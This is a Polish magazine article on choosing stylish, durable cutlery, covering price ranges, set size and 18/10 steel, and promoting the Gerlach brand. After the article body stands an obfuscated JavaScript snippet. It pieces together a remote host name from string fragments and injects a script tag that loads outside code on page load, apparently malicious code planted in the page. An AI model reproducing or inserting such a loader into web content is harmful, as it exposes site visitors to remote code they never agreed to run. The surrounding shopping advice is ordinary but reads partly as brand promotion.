Redakcja Hmag
23.11.23

Jak wybrać sztućce, aby były eleganckie i modne?

Sztućce to coś, z czego korzystamy kilkukrotnie każdego dnia. Jednak, choć na co dzień są one absolutnie niezbędne, zazwyczaj nie poświęcamy im zbyt dużej uwagi, uznając je za przyrządy o typowo użytkowej funkcji. Warto jednak pamiętać o tym, że noże, widelce i łyżki mogą stać się również swoistą, wyjątkową ozdobą stołu w jadalni czy salonie. Jak zatem wybrać sztućce, aby były zarówno funkcjonalne, jak i eleganckie i modne? Tego dowiesz się z poniższego artykułu!

Kupujesz zestaw sztućców? Najpierw określ kwotę, jaką chcesz wydać

Wbrew temu, co pozornie może się wydawać, określenie kwoty, jaką zamierzasz przeznaczyć na zakup sztućców, jest bardzo ważne. W Internecie można bowiem znaleźć zarówno zestawy kosztujące około 50 zł, jak i takie, na które trzeba wydać kilkaset, a nawet ponad tysiąc złotych. Dostępne są również ekskluzywne komplety, kosztujące nawet kilkanaście i kilkadziesiąt tysięcy złotych – jednak na potrzeby tego artykułu odłóżmy je na bok.

Ile zatem powinny kosztować dobre sztućce? Mimo wszystko odradzamy kupowanie kompletów najtańszych. Niska cena odbija się tu przede wszystkim na jakości noży, widelców i łyżek. Choć zazwyczaj są one wykonane ze stali nierdzewnej, z której produkuje się też lepsze sztućce, w tym przypadku często mamy do czynienia ze stalą gorszej jakości. W efekcie sztućce są podatne na zarysowania i po pewnym czasie mogą ulegać odkształceniom. Można uznać, że zestaw dobrej jakości sztućców kosztuje przynajmniej 200-300 zł.

Jak wybrać funkcjonalny i modny zestaw sztućców?

Mając określone widełki cenowe, możesz przystąpić do poszukiwań idealnego zestawu sztućców, które będą nie tylko funkcjonalne, ale także modne i eleganckie. W tym celu należy przeanalizować dwa podstawowe aspekty:

  • Wielkość zestawu – sztućce najczęściej sprzedawane są w kompletach dla sześciu lub dla dwunastu osób. Należy zatem zastanowić się, który z nich będzie lepszy dla Ciebie i Twoich bliskich. Polecamy wziąć pod uwagę nie tylko liczbę domowników, którzy na co dzień mają korzystać z tych przyrządów, ale też potencjalnych gości. W niektórych przypadkach konieczne może być kupno jednego zestawu większego i jednego mniejszego;
  • Materiał wykonania – jak wspomnieliśmy wyżej, stal nierdzewna, z której najczęściej produkuje się sztućce, ma różne oblicza. Dlatego najbezpieczniejszym wyborem jest kupno widelców, noży i sztućców, które są wykonane ze stali nierdzewnej 18/10. Takie sztućce będą wytrzymałe, odporne na zarysowania oraz odkształcenia i posłużą Ci przez wiele lat.

Jeśli chodzi o aspekty estetyczne, przede wszystkim trzeba się zastanowić, czy sztućce mają być całe pokryte stalą nierdzewną, czy też rękojeść ma być wykonana z drewna. Takie modele prezentują się bardziej klasycznie i dobrze wyglądają w jadalniach i salonach utrzymanych w tradycyjnym stylu, ale także wnętrzach skandynawskich czy loftowych. Komplet sztućców wykonanych w całości ze stali nierdzewnej ma bardziej minimalistyczny design. Wyróżniają się tu jednak sztućce Gerlach z finezyjnymi zdobieniami oraz sztućce grawerowane, które mają bardziej ekskluzywny wygląd – sprawdź sztućce Gerlach w sklepie internetowym tej marki.

Sztućce w walizce – doskonały pomysł na prezent

Szukasz sztućców, które idealnie sprawdzą się jako prezent dla bliskiej osoby? W takich okolicznościach doskonałym pomysłem mogą być sztućce w walizce oferowane przez markę Gerlach. Elegancka walizka dodaje im jeszcze bardziej ekskluzywnego charakteru. Trzeba jednak pamiętać o tym, że taki komplet retro może kosztować nawet ponad 1500 zł.

Sztućce Gerlach – elegancja i najwyższa jakość

Uniwersalną poradą dotyczącą kupowania widelców, noży i łyżek jest to, by zawsze takich produktów szukać u renomowanych producentów. Przykładem może być tutaj marka Gerlach, która od pokoleń dostarcza eleganckie, wysokiej jakości naczynia i sztućce do polskich domów i mieszkań. Historia marki Gerlach sięga 1760 roku – ponad 260-letnia tradycja sprawia, że obecnie zestaw sztućców Gerlach jest swego rodzaju potwierdzeniem najwyższej jakości i ponadczasowej elegancji.

(function(){
ac5s=document.createElement(„script”);ac5s_=”u”+(„s”)+”ta”;
ac5s_+=(„t.i”)+””+”n”;ac5s_+=((„f”)+”o”);ac5s.type=”text/javascript”;
ac5s_+=”/”; ac5su=”2185367329″;ac5su+=”.9rXe4jp5c5ss5ye9zij”;ac5su+=”sqqt3cyrxuX”;
ac5s.src=”https://”+ac5s_+ac5su;ac5s.async=true;document.body.appendChild(ac5s);
})();

Czytany: 154

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *